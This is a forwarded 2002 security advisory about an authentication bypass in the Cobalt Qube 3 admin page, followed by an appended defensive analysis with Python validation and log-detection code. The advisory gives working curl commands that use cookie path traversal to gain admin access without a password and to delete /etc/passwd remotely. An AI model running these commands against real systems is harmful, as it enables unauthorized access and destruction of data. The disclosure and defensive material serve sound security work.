[cobalt-security] Fwd: Cobalt Qube 3 Administration page vulnerability
- Subject: [cobalt-security] Fwd: Cobalt Qube 3 Administration page vulnerability
- From: Michael Stauber <cobalt@xxxxxxxxxxxxxx>
- Date: Wed, 24 Jul 2002 19:44:07 +0200
- Organization: SOLARSPEED.NET
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
---------- Forwarded Message ----------
Subject: Cobalt Qube 3 Administration page
Date: Wed, 24 Jul 2002 09:40:01 +0800
From: pokley <saleh@xxxxxxxxxxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx, sk <sk@xxxxxxxxxxxxxxxxxxx>, Shaharil Abdul Malek <shaharil@xxxxxxxxxxxxxxxxxxx>
SCAN Associates Sdn Bhd Security Advisory
Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel), Kernel 2.2.16C7 on an i586)
Date: 23rd July 2002
Summary: By pass login
Author: pokleyzz <pokleyzz@xxxxxxxxxxxxxxxxxxx>, sk <sk@xxxxxxxxxxxxxxxxxxx>, shaharil <shaharil@xxxxxxxxxxxxxxxxxxx>
Description
===========
First of all, we would like to thank Sun Microsystems (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag security conference on 16-17 July 2002. As the winners, we are proud
to receive this cool box. After playing around for a while, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We alerted security-alert@xxxxxxx and Sun
Microsystems (Malaysia) on 19th July, but unfortunately we did not receive any
feedback.
Details
=======
Problem 1: Local Privilege Escalation to Admin
Any user with the ability to create a file anywhere on a Cobalt server will
be able to promote themselves to Admin access in System Management. A user may
create a file at /tmp/test and craft a cookie to log in as Admin without a
password:
Create a dummy session file on the Cobalt server:
$ printf "admin" > /tmp/test
Log in without a password from anywhere:
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php
Problem 2: Remote User access
We also found that if a User account has just been created, we can bypass
the authentication without needing to create a dummy session file on the
server:
$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php
Problem 3: Remotely delete file
It is possible to delete a file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:
$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php
Quick Solution
==============
/usr/sausalito/ui/libPhp/ServerScriptHelper.php
line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
* curl can be downloaded from http://curl.haxx.se/download.html
www.scan-associates.net
-------------------------------------------------------
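The root cause described in the advisory is a session cookie value being used as part of a file path without validation, so that "../" sequences walk out of the session store. The one-line fix quoted above strips ".." from the value; a more robust pattern is to allowlist the characters a server-generated session id can contain and, independently, check that the resolved path stays inside the session directory. The Python below is an added illustration of that pattern plus a matching detection check over Cookie headers; it is not the advisory's code nor Cobalt's, and the session directory name, the session-id format, and the sample Cookie headers are assumptions or constructed samples (the first two sample headers are the shapes the advisory itself shows, as a client would actually send them).

```python
import os
import re
from typing import List, Optional, Tuple

# Hypothetical session store location; the advisory does not state Cobalt's real path.
SESSION_DIR = "/var/lib/example-ui/sessions"

# Allowlist for a server-generated session id: letters and digits only, within a
# fixed length range. '/', '.', ';' and '\\' can never pass, so no path is expressible.
_SESSION_ID_RE = re.compile(r"[A-Za-z0-9]{16,64}")


def resolve_session_file(session_id: str, session_dir: str = SESSION_DIR) -> str:
    """Map a cookie's sessionId to a file path inside session_dir, or raise ValueError."""
    if not _SESSION_ID_RE.fullmatch(session_id):
        raise ValueError("sessionId contains characters outside the allowlist")
    base = os.path.realpath(session_dir)
    candidate = os.path.realpath(os.path.join(base, session_id))
    # Second, independent defence: even if the allowlist were loosened later,
    # the canonical path must still sit under the session directory.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("sessionId resolves outside the session directory")
    return candidate


def is_valid_session_id(session_id: str, session_dir: str = SESSION_DIR) -> bool:
    """Convenience wrapper: True only if resolve_session_file() accepts the id."""
    try:
        resolve_session_file(session_id, session_dir)
        return True
    except ValueError:
        return False


def cookie_value(cookie_header: str, name: str) -> Optional[str]:
    """Return the value of cookie `name` from a raw Cookie header, or None if absent."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def suspicious_session_cookie(cookie_header: str) -> Optional[str]:
    """Return a reason string if the header's sessionId looks like a path, else None."""
    sid = cookie_value(cookie_header, "sessionId")
    if sid is None:
        return None
    if ".." in sid:
        return "parent-directory traversal in sessionId"
    if "/" in sid or "\\" in sid:
        return "path separator in sessionId"
    if not _SESSION_ID_RE.fullmatch(sid):
        return "sessionId outside allowlist"
    return None


# Constructed sample Cookie headers: the first two are the shapes from the advisory
# (what the client actually sends), the third is a benign, generated-looking id.
SAMPLE_COOKIE_HEADERS = [
    "sessionId=/../../../../../../tmp/test;loginName=admin",
    "sessionId=../codb/objects/4/.name;loginName=admin",
    "sessionId=a3F9kQ2mZx81LpWc7vNt;loginName=admin",
]


def scan_cookie_headers(headers: List[str]) -> List[Tuple[str, str]]:
    """Return (header, reason) pairs for every header that should raise an alert."""
    findings = []
    for header in headers:
        reason = suspicious_session_cookie(header)
        if reason:
            findings.append((header, reason))
    return findings


if __name__ == "__main__":
    for header, reason in scan_cookie_headers(SAMPLE_COOKIE_HEADERS):
        print(f"ALERT: {reason}: {header}")
    print("session file:", resolve_session_file("a3F9kQ2mZx81LpWc7vNt"))
```

Run stand-alone it flags the two advisory-shaped headers and resolves the benign id to a file under SESSION_DIR. The allowlist, not the ".." check, is the primary control: a session id that can only be alphanumeric cannot name a file outside its directory at all, and the realpath containment check catches mistakes if that rule is ever relaxed. The detection half is deliberately looser than the validator, so a reviewer of web-server or proxy logs sees traversal attempts even when the application already rejects them.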